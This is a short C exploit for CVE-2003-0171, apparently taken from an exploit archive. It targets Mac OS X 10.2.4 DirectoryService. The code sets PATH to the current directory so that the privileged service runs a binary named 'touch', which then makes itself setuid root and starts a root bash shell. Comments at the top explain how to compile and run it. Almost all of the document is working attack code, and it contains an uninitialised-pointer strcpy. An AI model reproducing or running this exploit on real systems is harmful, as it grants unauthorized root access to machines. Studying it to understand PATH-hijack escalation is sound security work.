Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Local Privilege Escalation - CVE-2003-0171

1. /*
2.    OS X <= 10.2.4 DirectoryService local root PATH exploit
3.    DirectoryService must be crashed prior to execution, per
4.    @stake advisory.  If you discover how to crash DirectoryService
5.    e-mail me at neeko@haackey.com  [Neeko Oni]
6.  
7. --
8. Assuming DirectoryService has been crashed/killed, compile
9. this code as 'touch' (gcc osxds.c -o touch) and execute.
10.  
11. bash$ ./touch
12. *bunch of stuff here*
13. euid is root.
14. bash#
15.  
16. */
17.  
18. #include <stdio.h>
19. #include <stdlib.h>
20. #include <unistd.h>
21. #include <sys/types.h>
22.  
23. int
24. main(int argc, char **argv)
25. {
26.     char           *ORIGPATH;
27.     int             temp;
28.     if (argc < 2) {
29.         if (geteuid() == 0) {
30.         printf("euid is root.\n");
31.         setuid(0);
32.         execl("/bin/bash", "bash", NULL);
33.         }
34.         strcpy(ORIGPATH, getenv("PATH"));
35.         printf("Original path: %s\n", ORIGPATH);
36.         setenv("PATH", ".", 1);
37.         printf("New path: %s\n", getenv("PATH"));
38.         printf("Executing DirectoryService with false PATH...\n");
39.         if (fork() == 0) {
40.             execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
41.         }
42.         printf("Forked DirectoryService, pausing before shell exec...\n");
43.         sleep(3);
44.         printf("Cross your fingers.\n");
45.         setenv("PATH", ORIGPATH, 1);
46.         printf("Path restored: %s\n", getenv("PATH"));
47.         execl("./touch", "touch", NULL);       
48.     }
49. system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
50. }
51.  
52. // milw0rm.com [2003-04-18]